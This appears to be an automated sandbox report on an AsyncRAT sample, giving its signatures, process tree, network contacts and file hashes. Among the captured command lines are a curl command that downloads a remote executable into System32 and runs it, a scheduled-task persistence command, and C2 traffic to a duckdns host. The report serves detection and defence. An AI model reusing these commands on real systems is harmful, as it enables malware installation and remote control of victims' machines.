Malware Analysis Report

2024-09-22 06:52

Sample ID 240620-etclzasfln
Target usermode.exe
SHA256 7cbd57fe2ffbaa6da63c865cce81eaf33c083e0b23d69cde51ada9f91f309a99
Tags
asyncrat default rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7cbd57fe2ffbaa6da63c865cce81eaf33c083e0b23d69cde51ada9f91f309a99

Threat Level: Known bad

The file usermode.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat default rat

AsyncRat

Async RAT payload

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Delays execution with timeout.exe

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-20 04:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-20 04:13

Reported

2024-06-20 04:14

Platform

win7-20240419-en

Max time kernel

63s

Max time network

65s

Command Line

"C:\Users\Admin\AppData\Local\Temp\usermode.exe"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2372 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\usermode.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\usermode.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\usermode.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\usermode.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\usermode.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\usermode.exe C:\Windows\system32\cmd.exe
PID 2920 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2920 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2920 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2920 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2920 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2920 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2920 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2920 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2920 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe

Processes

C:\Users\Admin\AppData\Local\Temp\usermode.exe

"C:\Users\Admin\AppData\Local\Temp\usermode.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

Network

Country Destination Domain Proto
US 8.8.8.8:53 keyauth.win udp
US 104.26.0.5:443 keyauth.win tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.63.101.171:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
N/A 127.0.0.1:49188 tcp
N/A 127.0.0.1:49190 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-20 04:13

Reported

2024-06-20 04:16

Platform

win10v2004-20240611-en

Max time kernel

140s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\usermode.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation C:\Windows\System32\boot_cnfg_x32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System32\boot_cnfg_x32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Update.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\boot_cnfg_x32.exe C:\Windows\system32\curl.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\boot_cnfg_x32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 856 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\usermode.exe C:\Windows\system32\cmd.exe
PID 856 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\usermode.exe C:\Windows\system32\cmd.exe
PID 4016 wrote to memory of 4412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4016 wrote to memory of 4412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4016 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\boot_cnfg_x32.exe
PID 4016 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\boot_cnfg_x32.exe
PID 4500 wrote to memory of 2716 N/A C:\Windows\System32\boot_cnfg_x32.exe C:\Windows\System32\cmd.exe
PID 4500 wrote to memory of 2716 N/A C:\Windows\System32\boot_cnfg_x32.exe C:\Windows\System32\cmd.exe
PID 4500 wrote to memory of 4560 N/A C:\Windows\System32\boot_cnfg_x32.exe C:\Windows\system32\cmd.exe
PID 4500 wrote to memory of 4560 N/A C:\Windows\System32\boot_cnfg_x32.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 4472 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2716 wrote to memory of 4472 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 856 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\usermode.exe C:\Windows\system32\cmd.exe
PID 856 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\usermode.exe C:\Windows\system32\cmd.exe
PID 4560 wrote to memory of 944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4560 wrote to memory of 944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 884 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 884 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 884 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 884 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 884 wrote to memory of 3536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 884 wrote to memory of 3536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4560 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Update.exe
PID 4560 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Update.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\usermode.exe

"C:\Users\Admin\AppData\Local\Temp\usermode.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe

C:\Windows\system32\curl.exe

curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe

C:\Windows\System32\boot_cnfg_x32.exe

C:\\Windows\\System32\\boot_cnfg_x32.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Users\Admin\AppData\Roaming\Update.exe

"C:\Users\Admin\AppData\Roaming\Update.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4352,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:8

Network

Country Destination Domain Proto
GB 87.248.205.0:80 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
N/A 127.0.0.1:49840 tcp
N/A 127.0.0.1:49842 tcp
US 8.8.8.8:53 keyauth.win udp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 57.72.67.172.in-addr.arpa udp
US 20.189.173.15:443 tcp
US 8.8.8.8:53 hmnms.duckdns.org udp
CH 51.154.225.5:2035 hmnms.duckdns.org tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
CH 51.154.225.5:2035 hmnms.duckdns.org tcp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
N/A 127.0.0.1:49869 tcp
N/A 127.0.0.1:49871 tcp
US 172.67.72.57:443 keyauth.win tcp
CH 51.154.225.5:2035 hmnms.duckdns.org tcp
US 8.8.8.8:53 97.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 hmnms.duckdns.org udp
CH 51.154.225.5:2035 hmnms.duckdns.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
CH 51.154.225.5:2035 hmnms.duckdns.org tcp
CH 51.154.225.5:2035 hmnms.duckdns.org tcp

Files

C:\Windows\System32\boot_cnfg_x32.exe

MD5 8f601efcbf3eb183bbd6500296b9ccd2
SHA1 2542d3fe0e97fa969c0ef8e86676ba1c72e6e846
SHA256 5e4a8ebbeb1b7288087c65c0f5edf6d6016528f2bf5104cfc7fd5b315bf1affd
SHA512 d101aa1cc4281e29813aaa269b26d9e500a0ee042024273a636fc06d59d4af30d04d1670a58e54d3263cb6dfe9b67c71ef58c4175628841f2c8719260f548d08

memory/4500-4-0x00007FFA041D3000-0x00007FFA041D5000-memory.dmp

memory/4500-5-0x00000000009F0000-0x0000000000A02000-memory.dmp

memory/4500-6-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp

memory/4500-11-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat

MD5 2c8bc37b47cf08664a78ebbffd76d23b
SHA1 49e2f3d19a7b9edd662b9763ae47629496ca4758
SHA256 8a0da6a175df4c5ab306e7a27093f37aa60ef6f86f5e50d2b5c49fe991fad73a
SHA512 b81d18a37f816146daf286018ae6eea6ef888abb817d3db62d0552b7214494c5d2fd9a352176c84811a04581e3660da5c17a48aed696cd8feaaf0ee32f179648